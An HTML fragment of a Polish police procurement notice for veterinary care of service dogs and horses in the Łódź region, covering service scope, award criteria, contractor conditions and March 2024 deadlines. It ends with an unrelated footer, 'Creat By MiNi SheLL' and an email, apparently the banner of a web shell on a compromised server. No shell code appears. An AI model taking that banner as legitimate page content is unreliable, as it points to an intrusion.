następującej informacji:<br/>„PSY SŁUŻBOWE BĘDĄCE W EWIDENCJI KOMENDY WOJEWÓDZKIEJ POLICJI<br/>W ŁODZI PRZYJMOWANE SĄ POZA KOLEJNOŚCIĄ”<br/>9. Zamawiający zastrzega sobie prawo do zmiany ilości psów (zmniejszenie/zwiększenie) określonych<br/> w załączniku nr 2.1 do SWZ (formularzu asortymentowo-cenowym) w przypadku zakupu nowych zwierząt lub wycofania ze służby, zmiana ta nie będzie stanowić zmiany warunków umowy.<br/>10. Ustalone w ww. załączniku nr 2.1 ilości usług stanowią wielkości szacunkowe, stanowiące podstawę do sporządzenia oferty. Faktyczna ilość, rodzaj usług będzie zależna od potrzeb Zamawiającego<br/> i posiadanych przez niego środków budżetowych.<br/>11. Zamawiający dopuszcza wykonanie usługi w innym gabinecie weterynaryjnym w przypadku nagłych zachorowań, zdarzeń losowych zagrażających zdrowiu i życiu psa<br/>12. Wykonawca zobowiązuje się do realizacji usług zgodnie z treścią obowiązujących w Komendzie Wojewódzkiej Policji w Łodzi podstaw prawnych, tj.:<br/>1. Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 22 grudnia 2021 r., w sprawie psów służbowych i koni służbowych w Policji.<br/>2. Zarządzeniem nr 91 Komendanta Głównego Policji z dnia 04.10.2022 r. w sprawie metod i form wykonywania zadań z użyciem psów służbowych w Policji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85200000-1 - Usługi weterynaryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla każdej części osobno oferty niepodlegające odrzuceniu będą oceniane na podstawie kryterium:<br/>a.	cena oferty brutto (C) – 60 %,<br/>b.	czas realizacji usług w przypadku usług planowanych (T) – 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas realizacji usług w przypadku usług planowanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług weterynaryjnych na rzecz psów i koni służbowych będących na stanie Komendy Wojewódzkiej Policji w Łodzi oraz jednostek garnizonu łódzkiego. Szczegółowy opis przedmiotu zamówienia odpowiednio do części zawiera załącznik 5.1-5.2 do SWZ. <br/>Usługi będą realizowane sukcesywnie w okresie trwania umowy. <br/>Wykonawca zobowiązuje się realizować przedmiot zamówienia zgodnie z postanowieniami umowy, której wzór zawarto w załączniku nr 9 do SWZ.<br/>Zgodnie z art. 95 ust. 1 uPzp Zamawiający wymaga, aby Wykonawca/podwykonawca w okresie realizacji umowy zatrudniał osoby wykonujące czynności związane z leczeniem zwierząt na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26.06.1974 r. – Kodeks pracy (Dz. U. z 2023 r., poz. 1465). Powyższy wymóg nie dotyczy osób fizycznych prowadzących działalność gospodarczą w zakresie, w jakim będą wykonywać osobiście usługi na rzecz Zamawiającego. <br/>Postanowienia dotyczące sposobu dokumentowania zatrudnienia oraz kontroli spełniania przez wykonawcę lub podwykonawcę wymagań dotyczących zatrudnienia na podstawie umowy o pracę oraz postanowienia dotyczące sankcji z tytułu niespełnienia wymagań określonych w art. 95 ust. 1 określono w paragrafie § 5 każdego ze wzorów umowy (załącznik nr 9 do SWZ).<br/>Część 2 <br/>Świadczenie kompleksowych usług weterynaryjnych na rzecz koni służbowych będących na ewidencji KPP w Tomaszowie Mazowieckim.<br/>1. Przedmiotem zamówienia jest świadczenie usług weterynaryjnych na rzecz koni służbowych będących na ewidencji Komendy Powiatowej Policji w Tomaszowie Mazowieckim.<br/>2. Wykonawca zobowiązuje się należycie prowadzić na bieżąco dokumentację medyczną leczonych zwierząt, wypełniać dokumenty stanowiące załączniki do umowy. Zamawiający w każdej chwili może dokonać wglądu w dokumentację medyczną leczonych koni oraz poprosić o odpis z wyników badań i kart leczenia. <br/> Pod pojęciem dokumentacja medyczna należy rozumieć: zbiór danych o stanie zdrowia konia służbowego, udzielonych mu świadczeniach medycznych, podanych lekach, odbytych zabiegach oraz wizytach lekarskich.<br/>Należyte prowadzenie dokumentacji oznacza:<br/>a) wpis w dokumentacji dokonywany jest niezwłocznie po udzieleniu świadczenia;<br/>b) każdy wpis oznaczony jest danymi osoby, która go dokonała;<br/>c) wpis dokonany w dokumentacji nie może być z niej usunięty, możliwa jest natomiast jego zmiana w przypadku popełnienia błędu, jednakże w tym zakresie musi zostać zamieszczona szczegółowa adnotacja określająca przyczynę błędu oraz oznaczenie osoby, która dokonała zmiany wpisu;<br/>d) strony dokumentacji medycznej muszą być ponumerowane;<br/> e) dokumentacja powinna być wypełniana w sposób czytelny;<br/> f) wpisy powinny być dokonywane chronologicznie;<br/> g) każda strona dokumentacji konia służbowego powinna być oznaczona przynajmniej jego imieniem oraz numerem identyfikacyjnym;<br/> h) dokument, który został włączony do dokumentacji, nie może być z niej usunięty.<br/>3. Jednostka zlecająca - zobowiązana jest indywidualnie do sporządzania przed planowaną wizytą zlecenia z dokładnym opisem przyczyny wizyty oraz przesłania go do Wydziału GMT KWP Łódź w celu zabezpieczenia środków finansowych. <br/> Po uzyskaniu zgody pracownik Wydziału GMT KWP w Łodzi odeśle na e-mail jednostki zlecenie <br/>w celu umówienia spotkania z lekarzem weterynarii. Opiekun konia zobowiązany jest przedstawić zaakceptowane przez Wydział GMT KWP w Łodzi zlecenie lekarzowi weterynarii podczas wizyty.<br/> W wyjątkowych sytuacjach lekarz weterynarii może przyjąć konia służbowego bez zlecenia wyłącznie w przypadku nagłej wizyty ( zagrażającej życiu i zdrowiu konia), każda kolejna wizyta wymaga zlecenia zaakceptowanego przez Wydział GMT KWP w Łodzi.<br/>4. W przypadku nagłych urazów, wypadków zlecenie nie jest wymagane, jednak po wykonanej usłudze Opiekun konia zobowiązany jest sporządzić szczegółową notatkę służbową z podpisem przełożonego oraz załączyć ją do faktury wystawionej przez Przychodnię Weterynaryjną. <br/>5. Każde zlecenie ma zawierać numer / miesiąc / rok / KPP Tomaszów Mazowiecki/ oraz datę wystawienia.<br/>6. Wykonawca zobowiązuje się do wystawiania faktury po każdej wykonanej usłudze, w terminie nie przekraczającym 10 dni od daty jej wykonania i przesłania faktury do siedziby Zamawiającego. Do każdej faktury musi zostać dołączone zlecenie przekazane do Lecznicy przez jednostkę oraz Specyfikacja wykonanej usługi z wyszczególnieniem wszystkich czynności podjętych przez Lekarza Weterynarii oraz podanych leków. <br/>7. W zakres usług wchodzić powinny m. in.: <br/>1. Okresowy przegląd weterynaryjny wykonywany w siedzibie Wykonawcy w razie konieczności na terenie jednostki Zamawiającego, podczas którego będą wykonywane następujące czynności:<br/>- ważenie<br/>- mierzenie temperatury<br/>- osłuchiwanie<br/>- przegląd oczu, uszu, skóry, uzębienia i kopyt<br/> W przypadku stwierdzenia w wyniku przeglądu konieczności wykonania zabiegów pielęgnacyjnych, lekarz weterynarii może wykonać następujące czynności:<br/> - czyszczenie uszu<br/>- czyszczenie gruczołów około odbytniczych<br/>- usunięcie kamienia nazębnego<br/> 2. Szczepienia ochronne wykonywane raz w roku w siedzibie Zamawiającego lub podczas przeglądu okresowego (jeżeli termin wykonania kolejnego szczepienia to umożliwia)<br/>- szczepienie przeciwko wściekliźnie<br/>- szczepienie przeciwko tężcowi i grypie <br/>- szczepienie przeciwko chorobom grzybicznym<br/>- szczepienie przeciw schorzeniom wywołanym przez Herpes Virusy<br/>3. Diagnozowanie, leczenie, wykonywanie badań i zabiegów według potrzeb obejmuje następujące czynności:<br/> - diagnozowanie i leczenie chorób układu oddechowego, krążenia, pokarmowego, moczowego i nerwowego, leczenie dietetyczne chorób wewnętrznych, prowadzenie leczenia i monitoring zwierząt przewlekle chorych, <br/>- rozpoznawanie, zapobieganie i leczenie chorób zakaźnych zwierząt,<br/>- diagnostyka chorób kwalifikujących się do leczenia chirurgicznego, drobne zabiegi chirurgiczne,<br/>- diagnozowanie urazów kończyn i kręgosłupa (badanie RTG), diagnostyka i leczenie chorób stawów,<br/>- badanie okulistyczne, leczenie zachowawcze chorób gałki ocznej, szycie ran, <br/>- diagnozowanie schorzeń układu rozrodczego, diagnostyka i leczenie chorób jąder i prostaty, <br/> - diagnozowanie chorób alergicznych i hormonalnych skóry, testy alergiczne, laboratoryjne badanie zeskrobin skórnych i wymazów z uszu, wykonywanie posiewów i anybiogramów, leczenie zaburzeń okrywy włosowej, leczenie dietetyczne (diety lecznicze),<br/>- wykonywanie eutanazji, oględzin i odbiór zwłok zwierząt wraz z wydaniem stosownych zaświadczeń i protokołów.<br/>Dla Zamawiającego usługi planowane to usługi o, których mowa w punkcie 1-2 , natomiast Usługi nieplanowane to: zdarzenia losowe, choroby, itp. <br/>8. Wykonawca zobowiązuje się do:<br/>- świadczenia usług weterynaryjnych w siedzibie Zamawiającego (na terenie województwa łódzkiego) a w razie konieczności w siedzibie Wykonawcy<br/>- wykonywania okresowych badań (przeglądów) koni <br/>- ewentualnego udziału w pracach zespołu zajmującego się organizacją używania i utrzymania koni zgodnie z Zarządzeniem nr 84 Komendanta Głównego Policji z dnia 29.07.2022 r.<br/>- zapewnienia odpowiednich warunków lokalowych oraz wyposażenia techniczno – medycznego niezbędnego do należytego wykonania usługi – w przypadku świadczenia usług na terenie siedziby Wykonawcy.<br/>- prowadzenia na bieżąco dokumentacji medycznej leczonych zwierząt, wypełniania dokumentów stanowiących załączniki do umowy, dokonywania wpisów w kartach przebiegu leczenia oraz w książeczkach zdrowia koni, obejmujących rodzaj zastosowanego leczenia, w tym przeprowadzone zabiegi i zastosowane środki medyczne. <br/>- okazania Zamawiającemu w każdej chwili dokumentacji medycznej konia służbowego. <br/>9. Zamawiający zastrzega sobie prawo do zmiany ilości koni (zmniejszenie/zwiększenie) określonych w załączniku nr 2.2 do SWZ (formularzu asortymentowo-cenowym) w przypadku zakupu nowych zwierząt lub wycofania ze służby, zmiana ta nie będzie stanowić zmiany warunków umowy.<br/>10. Ustalone w ww. załączniku nr 2.2 ilości usług stanowią wielkości szacunkowe, stanowiące podstawę do sporządzenia oferty. Faktyczna ilość, rodzaj usług będzie zależna od potrzeb Zamawiającego<br/> i posiadanych przez niego środków budżetowych.<br/>11. Zamawiający dopuszcza wykonanie usługi w innym gabinecie weterynaryjnym w przypadku nagłych zachorowań, zdarzeń losowych zagrażających zdrowiu i życiu konia.<br/>12. Wykonawca zobowiązuje się do realizacji usług zgodnie z treścią obowiązujących w Komendzie Wojewódzkiej Policji w Łodzi podstaw prawnych, tj.:<br/>1. Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 22 grudnia 2021 r., w sprawie psów służbowych i koni służbowych w Policji.<br/>2. Zarządzeniem nr 84 Komendanta Głównego Policji z dnia 29 lipca 2022 r. w sprawie metod i form wykonywania zadań z użyciem koni służbowych oraz szczegółowych zasad szkolenia policjantów i koni w Policji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85200000-1 - Usługi weterynaryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla każdej części osobno oferty niepodlegające odrzuceniu będą oceniane na podstawie kryterium:<br/>a.	cena oferty brutto (C) – 60 %,<br/>b.	czas realizacji usług w przypadku usług planowanych (T) – 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas realizacji usług w przypadku usług planowanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek zdolności technicznej lub zawodowej.<br/>Zamawiający uzna warunek za spełniony jeżeli wykonawca dysponuje co najmniej jedną osobą skierowaną przez wykonawcę do realizacji zamówienia publicznego posiadającą odpowiednie wykształcenie (dyplom lekarza weterynarii) , kwalifikacje zawodowe i prawo wykonywania zawodu wydane przez właściwą okręgową radę lekarsko weterynaryjną. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie Wykonawcy na podstawie art. 125 ust. 1 uPzp – wg załącznika nr 3 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca składa:<br/>wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/><br/>Wykaz musi potwierdzać spełnienie warunku udziału w postępowaniu w zakresie określonym w pkt 10.2.4. SWZ . Wzór Wykazu osób stanowi załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia /konsorcjum, spółka cywilna, osoby fizyczne działające razem/.<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Żaden z wykonawców wspólnie ubiegających się o zamówienie nie może podlegać wykluczeniu z postępowania na podstawie art. 108 ust. 1 uPzp oraz na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023r poz. 129 ze zm.).<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, roboty budowlane do realizacji których te zdolności są wymagane zgodnie z opisem warunku w pkt. 10.2.4 SWZ.<br/>Każdy z wykonawców wspólnie ubiegających się o zamówienie składa:<br/>-oświadczenie, na podstawie art. 125 ust. 1 uPzp. potwierdzające brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określono we wzorach umów zawartych w załączniku nr 9 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza drogą elektroniczną, poprzez odpowiednią stronę, dedykowaną dla niniejszego postępowania na platformazakupowa.pl lub profilu nabywcy https://platformazakupowa.pl/transakcja/899717</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-22 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-04-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com